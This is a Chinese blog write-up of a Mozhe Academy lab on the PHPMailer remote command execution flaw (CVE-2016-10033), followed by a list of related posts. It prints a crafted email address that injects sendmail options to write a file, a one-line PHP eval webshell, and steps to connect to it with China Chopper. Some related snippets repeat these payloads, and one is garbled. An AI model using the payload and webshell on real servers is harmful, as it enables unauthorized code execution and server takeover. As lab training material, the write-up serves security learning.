墨者学院_PHPMailer远程命令执行漏洞溯源

利用邮件注入漏洞获取服务器KEY
最新推荐文章于 2023-03-17 05:00:00 发布
原创 最新推荐文章于 2023-03-17 05:00:00 发布 · 355 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#墨者学院 #命令执行

本文介绍了一种通过邮件注入漏洞获取服务器KEY的方法。步骤包括:在靶场找到发送邮件的功能,构造特殊格式的邮件地址和消息体,使用菜刀连接到服务器上的特定文件,最终在根目录下获取到KEY。

1.打开靶场,找到发送邮件的位置,进入邮件页面
2.填写邮件消息
1.任意用户名
2.在email写入:
“aaa”. -OQueueDirectory=/tmp/. -X/var/www/html/a.php @aaa.com
3.在message写入:
<?php @eval($_POST[a]);?>
3.使用菜刀连接,链接是:http://219.153.49.228:41056/a.php
4.在根目录下得到KEY

cc_de_csdn
关注
PHPMailer远程命令执行漏洞复现(CVE-2016-10033)
谢公子的博客
04-05 2381
PHPMailer是一个基于PHP语言的邮件发送组件,被广泛运用于诸如WordPress、Drupal、1CRM、SugarCRM、Yii、Joomla等用户量巨大的应用与框架中。 CVE-2016-10033是PHPMailer中存在的高危漏洞,这个高危漏洞是由 class.phpmailer.php 没有正确处理用户的请求导致的攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,造...
墨者学院-WordPress 远程命令执行漏洞(CVE-2018-15877)复现
ploto_cs的博客
10-08 796
1.访问目标网站 2.使用御剑对域名进行探测 常用HTTP响应码: 200一交易成功 302一跳转 400一错误请求 403一禁止访问 404一未发现目标 500一内部服务器错误 3.发现存在登录的网址 网址:http://219.153.49.228:46188/wp-admin/ 4.使用BP对网站后台账户密码进行爆破 通过使用暴力破解可以得到 User:admin Password:123qwe 5.登录后台 因为是Activity Monitor插件远程命令执行漏洞 Activity Mon
墨者学院-PHPMailer远程命令执行漏洞溯源
qq_47094508的博客
07-01 1024
拿到靶场之后点击访问分享一个小工具,用来爬取相关的url Link Gopher可以看到有用的就一个mail.php 进入之后来到一个邮件测试页面,很明显这里是一个功能点 phpmailer介绍PHPMailer是一个用于发送电子邮件的PHP函数包。直接用PHP就可以发送,无需搭建复杂的Email服务。相关漏洞CVE编号(CVE-2016-10033)burp抓包,更改email处payload为 更改message处payload为 然后访问http://124.70.71.251
墨者靶场 初级:PHPMailer远程命令执行漏洞溯源
qq_43233085的博客
01-14 772
墨者靶场 初级:PHPMailer远程命令执行漏洞溯源题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 安全工程师对某网站进行授权测试,发现了一个管理员留下的邮件测试页面,你能帮他完成测试吗 实训目标 1、了解PHPMailer用处; 2、了解Burp suite中Spider模块使用方法; 3、了解PHPMailer远程命令执行漏洞形成原因; 4、了解PHPMailer远程命令执行漏洞利用...
PHPMailer远程命令执行漏洞溯源
cc_de_csdn的博客
08-25 355
1.打开靶场,找到发送邮件的位置,进入邮件页面 2.填写邮件消息 1.任意用户名 2.在email写入: “aaa”. -OQueueDirectory=/tmp/. -X/var/www/html/a.php @aaa.com 3.在message写入: <?php @eval($_POST[a]);?> 3.使用菜刀连接,链接是:http://219.153.49.228:4105...
墨者学院_CMS系统漏洞分析溯源(第9题)
weixin_50698958的博客
09-23 748
漏洞概述: 在 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warnings.filterwarnings('ignore') import ssl ssl._
墨者学院Tomcat 远程代码执行漏洞利用
wrypot的博客
03-17 368
发现抓不到包,刷新两下然后放包试试,放包到看到这个界面就可以了,看地址判断有没有抓到包。墨者学院Tomcat 远程代码执行漏洞利用。进靶场后界面是这样的,先用bp抓包。抓到包之后用PUT传参。
墨者 - PHPMailer远程命令执行漏洞溯源
吃肉唐僧的博客
06-30 1616
用bp抓包,发现与后台交互的文件 构建email "aaa".-OQueueDirectory=/tmp/.-X/var/www/html/a.php@ aaa.com message <?php@eval($_REQUEST[a]);?> 访问a.php文件,上传成功 菜刀无惧链接 原理参考:https...
墨者PHPMailer远程命令执行漏洞溯源题解
zr1213159840的博客
01-07 601
打开环境后,给了一个页面,但是啥也没有,看不出来 对目录进行一下爆破试试,使用dirsearch,能看到有个mail.php 百度一下看下这个phpmailer有什么问题,发现存在命令执行漏洞,那么就是按照步骤跑就行了。 打开xxx/mail.php页面,在you name栏里面随便写啥,比如abc。在your email栏中填入:“aaa”. -OQueueDirectory=/tmp/. -X/var/www/html/a.php @ aaa.com 在your message中填入一句话木马 &
PHPMailer远程命令执行漏洞复现
thelostworld
12-31 2068
PHPMailer远程命令执行漏洞复现 一、漏洞简介 PHPMailer是PHP电子邮件创建及传输类,用于多个开源项目:WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等。 PHPMailer < 5.2.18版本存在安全漏洞,可使未经身份验证的远程攻击者在Web服务器用户上下文中执行任意代码,远程控制目标web应用。 二、影响版本: PHPMailer<5.2.18 三、漏洞复现 Docker环境: dockerrun --r..
经典CVE:PHPMailer 远程命令执行漏洞
zh的博客
10-15 623
靶场地址:http://whalwl.site:8038/ 解题准备:了解PHPMailer 远程命令执行漏洞的利用方法 解题思路: 1、在右键发送页面,构造一句话 2、提示发送失败,但其实一句话已经完成 3、 尝试访问一句话,成功 4、蚁剑连接成功,去找flag把 ...
漏洞情报 | PHPMailer 多个远程代码执行漏洞
爱国小白帽
06-18 743
​ 点击上方 订阅话题 第一时间了解漏洞威胁 0x01 漏洞描述 PHPMailer是一个用于发送电子邮件的PHP类库。 2021年6月18日,360漏洞云监测到PHPMailer 6.5.0之前的版本存在多个远程代码执行漏洞。 CVE-2021-34551:该漏洞源于在处理$lang_path参数时对setLanguage()方法内用户提供数据的验证不足,远程攻击者可向应用传送一个特殊构造的输入,通过受影响的参数设置UNC路径,从而在系统上执行任意PHP代码。 CVE-2021-3603:该该漏洞
在线靶场-墨者-命令执行2星-PHPMailer远程命令执行漏洞溯源
weixin_42079912的博客
08-09 452
打开靶场网页,根据题意管理员留下的邮件测试页面。于是寻找邮件测试页面。 打开邮件测试页面。 使用邮件注入木马 You name:mozhe(随便输入) Your email:“abc”. -OQueueDirectory=/tmp/. -X/var/www/html/abc.php @abc.com(abc可更改) You message:<?php @eval($_POST[abc])...
PHPMailer远程代码执行高危漏洞(CVE-2016-10033)
Anprou的博客
12-27 2173
据说其全球范围内的用户量大约有900万——每天还在持续增多。
墨者学院WebShell文件上传漏洞分析溯源(第1题)
最新发布
04-03
### 墨者学院 WebShell 文件上传漏洞分析与溯源方法 #### 背景概述 WebShell 是一种嵌入到目标服务器中的脚本程序,攻击者可以通过它远程控制受害者的服务器。文件上传漏洞通常允许攻击者通过伪造请求或其他手段绕...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值